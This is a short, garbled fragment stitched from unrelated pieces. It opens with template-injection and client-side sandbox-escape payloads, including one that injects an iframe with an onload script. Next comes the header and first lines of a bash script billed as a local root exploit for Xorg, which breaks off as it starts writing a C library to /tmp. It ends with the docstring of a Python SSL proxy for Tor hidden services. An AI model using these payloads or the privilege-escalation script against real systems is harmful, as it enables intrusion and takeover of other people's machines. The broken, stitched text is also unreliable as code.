{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
#!/bin/bash | |
# x0rg - Xorg Local Root Exploit | |
# Released under the Snitches Get Stitches Public Licence. | |
# props to prdelka / fantastic for the shadow vector. | |
# Gr33tz to everyone in #lizardhq and elsewhere <3 | |
# ~infodox (25/10/2018) | |
# FREE LAURI LOVE! | |
echo "x0rg" | |
echo "[+] First, we create our shell and library..." | |
cat << EOF > /tmp/libhax.c |
#!/usr/bin/env python | |
""" | |
Proxy an SSL connection to a Twisted endpoint based on the SNI extension | |
Allows for end-to-end encrypted connections from a browser to a Tor hidden | |
service. | |
Proxy code based on | |
http://blog.laplante.io/2013/08/a-basic-man-in-the-middle-proxy-with-twisted/ |